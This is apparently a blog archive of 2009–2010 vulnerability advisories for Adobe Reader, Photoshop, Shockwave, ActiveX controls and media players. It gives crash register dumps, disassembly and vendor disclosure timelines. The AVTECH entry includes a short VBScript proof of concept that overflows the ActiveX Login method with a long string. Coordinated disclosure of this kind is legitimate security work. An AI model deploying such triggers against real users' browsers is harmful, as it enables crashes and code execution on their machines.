Posts Tagged ‘ exploit

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability


Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability


Adobe Reader software is the global standard for electronic document sharing. It is the only PDF
file viewer that can open and interact with all PDF documents. Use Adobe Reader to view, search,
digitally sign, verify, print, and collaborate on Adobe PDF files.


Adobe Systems Incorporated

Product Web Page:

Version tested:



Adobe Reader suffers from a remote memory corruption vulnerability that causes the application to
crash while processing the malicious .PDF file. The issue is triggered when the reader tries to
initialize the CoolType Typography Engine (cooltype.dll). This vulnerability also affects and crashes
major browsers like: Mozilla Firefox, Opera and Apple Safari. Google Chrome & IE does not crash.
Talking about Blended Threat Vulnerabilities ;).


(bd0.e14): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=313100ee ebx=0211a722 ecx=00000031 edx=02e091a4 esi=00017e58 edi=00000000
eip=08075dc2 esp=0012d478 ebp=0012d488 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
08075dc2 660fb644322c movzx ax,byte ptr [edx+esi+2Ch] ds:0023:02e21028=??


Tested On:

Microsoft Windows XP Professional SP3 (English)
Microsoft Windows XP Professional SP2 (English)
Microsoft Windows 7 Ultimate
GNU/Linux Ubuntu Desktop 9.10 (i386) 32-bit
GNU/Linux Fedora 10 (Cambridge) /

Vendor Status:

18.04.2010 – Vendor informed.
18.04.2010 – Vendor replied.
07.05.2010 – Asked vendor for confirmation.
07.05.2010 – Vendor confirms vulnerability.
03.06.2010 – Asked vendor for status.
03.06.2010 – Vendor replied.
24.06.2010 – Vendor reveals patch release date.
29.06.2010 – Coordinated public advisory.

Advisory Details:

Zero Science Lab Advisory ID: ZSL-2010-4943
Adobe Advisory ID: APSB10-15
CVE ID: CVE-2010-2204

Live Demo:

Vulnerability Discovered By:

Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab –


UK One Media CMS (id) Error Based SQL Injection Vulnerability

Summary: Content Management System (PHP+MySQL)

Vendor: UK One Media –

Desc: UK One Media CMS suffers from an sql injection vulnerability when parsing query from the id param which results in compromising the entire database structure and executing system commands.

Tested on Apache 2.x (linux), PHP/5.2.11 and MySQL/4.1.22

More details:

Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability

Vendor: Adobe Systems Inc.

Product Web Page:

Version tested: CS3 10.0

Summary: Adobe® InDesign® CS3 software provides precise control over typography and built-in creative tools for designing, preflighting, and publishing documents for print, online, or to mobile devices. Include interactivity, animation, video, and sound in page layouts to fully engage readers.

Desc: When parsing .indd files to the application, it crashes instantly overwriting memory registers. Depending on the offset, EBP, EDI, EDX and ESI gets overwritten. Pottential vulnerability use is arbitrary code execution and denial of service.

Tested on Microsoft Windows XP Professional SP3 (English)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab –


Vendor status:

[16.09.2009] Vulnerability discovered.
[09.03.2010] Vulnerability reported to vendor with sent PoC files.
[21.03.2010] Asked confirmation from the vendor.
[21.03.2010] Vendor asked for PoC files due to communication errors.
[22.03.2010] Re-sent PoC files to vendor.
[04.04.2010] Vendor confirms vulnerability.
[03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
[04.06.2010] Public advisory released.

Zero Science Lab Advisory ID: ZSL-2010-4941

More info:

Multiple File Handling Vulnerabilities in Photoshop CS4 Extended

The Adobe® Photoshop® family of products is the ultimate playground for bringing out the best in your digital images, transforming them into anything you can imagine and showcasing them in extraordinary ways.

Adobe Photoshop CS4 Extended suffers from a buffer overflow vulnerability when dealing with .ABR (brushes), .GRD (gradients) and .ASL (styles) format file. The application failz to sanitize the user input resulting in a memory corruption, overwriting several memory registers which can aid the atacker to gain the power of executing arbitrary code or denial of service.

More info:

Adobe Shockwave Player (DIR) Multiple Memory Vulnerabilities

Title: Adobe Shockwave Player (DIR) Multiple Memory Vulnerabilities

Vendor: Adobe Systems Incorporated

Product web page:

Summary: Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player.
These people now have access to some of the best the Web has to offer – including
dazzling 3D games and entertainment, interactive product demonstrations, and online
learning applications. Shockwave Player displays Web content that has been created
by Adobe Director.

Desc: Shockwave Player version and earlier from Adobe suffers from a memory consumption /
corruption and buffer overflow vulnerabilities that can aid the attacker to cause denial of service
scenarios and arbitrary code execution. The vulnerable software fails to sanitize user input when
processing .dir files resulting in a crash and overwrite of a few memory registers.

Tested on: Microsoft Windows XP Professional SP3 (English)

Version tested:

(f94.ae4): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8
eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll –
68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????


ECX 41414141
EBX 00000018
ESP 0012F3B4
EBP 02793578
ESI 0012F3C4
EDI 02793578
EIP 69009F1F IML32.69009F1F

More info:

Edrawsoft Security Advisories

EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC

– EDraw Flowchart ActiveX Control version 2.3 suffers from a buffer overflow vulnerability when parsing .edd file format resulting in an application crash and overwritten few memory registers which can aid the attacker toexecute arbitrary code.



EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)

– EDraw Flowchart ActiveX Control EDImage.OCX suffers from a denial of service vulnerability when parsing large amount of bytes to the OpenDocument() function, resulting in browser crash and unspecified memory corruption.



AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities

Vendor: AVTECH Software, Inc.
Product Web Page:

Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
multi-OS computers and network issues throughout a department or an entire enterprise.
Once issues or events occur, AVTECH Software products use today’s most advanced alerting
technologies to communicate critical and important status information to remote system
managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
and shutdown/restart servers or applications.

AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
specifically designed to monitor today’s advanced computer rooms and data centers. Our Room Alert
and TemPageR products are used to monitor environmental conditions in many of the world’s most
secure data centers and are installed in almost every branch of the US government.

Description: AVTECH Software’s AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.


Disasm: 10006C23    MOV [EAX],CL    (AVC_AX_724_VIEWER.dll)

Seh Chain:
1     10022F68     AVC_AX_724_VIEWER.dll
2     FC2950     VBSCRIPT.dll
3     7C839AC0     KERNEL32.dll

Called From                   Returns To
AVC_AX_724_VIEWER.10006C23    AVC_AX_724_VIEWER.10044508
AVC_AX_724_VIEWER.10044508    AVC_AX_724_VIEWER.100097B0
AVC_AX_724_VIEWER.100097B0    8244C8B

EIP 10006C23
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: ‘$’$
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC

Block Disassembly:
10006C12    MOV EAX,[EBP+144]
10006C18    ADD EAX,60
10006C1B    JMP SHORT 10006C20
10006C1D    LEA ECX,[ECX]
10006C20    MOV CL,[EDX]
10006C22    INC EDX
10006C23    MOV [EAX],CL      <— CRASH
10006C25    INC EAX
10006C26    TEST CL,CL
10006C28    JNZ SHORT 10006C20
10006C2A    MOV EAX,[ESP+20]
10006C2E    ADD EAX,-10
10006C31    LEA ECX,[EAX+C]
10006C37    LOCK XADD [ECX],EDX

EBP+8    00FE4658 -> 10044530 -> Asc: 0E0E
EBP+16    0018AB44 -> Uni: defaultV
EBP+20    00180A54 -> Uni: defaultV
EBP+24    00000001
EBP+28    00000001

Stack Dump:
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00  […………t…]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10  [….h………..]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00  [….t………..]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00  [\………….G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77  [XF……….DJ.w]


Proof Of Concept:

<object classid=’clsid:8214B72E-B0CD-466E-A44D-1D54D926038D’ id=’kungfuhustle’ />
<script language=’vbscript’>

targetFile = “C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll”
prototype  = “Sub Login (

ByVal Username As String,
ByVal Password As String,
ByVal MediaType As String,
ByVal ConnectType As String

memberName = “Login”
progid     = “AVC781Viewer.CV781Object”
argCount   = 4

arg1=String(1010, “A”)

kungfuhustle.Login arg1 ,arg2 ,arg3 ,arg4


More info:

Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory Corruption PoC


The eToken PKI Client is the software that enables eToken USB operation and the implementation of eToken PKI-based solutions. These solutions include certificate-based strong two-factor authentication, encryption and digital signing. With the PKI Client your PKI solutions become highly secure, extremely convenient and portable, as you can easily and securely generate and store PKI keys on-board eToken smart card-based devices.


eToken PKI Client is prone to an unspecified memory-corruption vulnerability. An attacker can exploit this issue by tricking a victim into opening a malicious ETV file to execute arbitrary code and to cause denial-of-service conditions.


More info:

BS.Player v2.51 build 1022 (Media Library) Remote Buffer Overflow Vulnerability

Ever since the very beginning in the year 2000, the BS.Player™ has been one of the world’s most popular video players. It is popular for many reasons. One however should be pointed out: BS.Player™ is the first software movie player ever to enable its users to focus on watching the movie instead of dealing with poor computer capabilities or running around looking for a proper setting and codec. Also, it has very low CPU and RAM requirements.

BS.Player and its feature Media Library is prone to a buffer overflow vulnerability because it fails to adequatly sanitize boundry check when processing mp3 file and its metadata. When you load the evil .mp3 file in the Media Library > Audio launched from bsplayer the application crashes instantly giving us info that ECX and EIP got overwritten enabling the attacker to gain full access to the application’s memory and execute arbitrary code.

Version tested: 2.41 build 1003 and 2.51 build 1022



More INFO:

J. River Media Jukebox 12 MP3 File Handling Remote Heap Overflow PoC

Media Jukebox 12 is a media player application for playing various media files on a Windows machine.

Desc: Media Jukebox 12 suffers from a heap overflow vulnerability when processing .mp3 files and its metadata (ID3 tags). When a malicious .mp3 file is played the application pops out an error message and crashes. The ECX register gets overwritten allowing the attacker the possibility of system access remotely or localy.

More Info: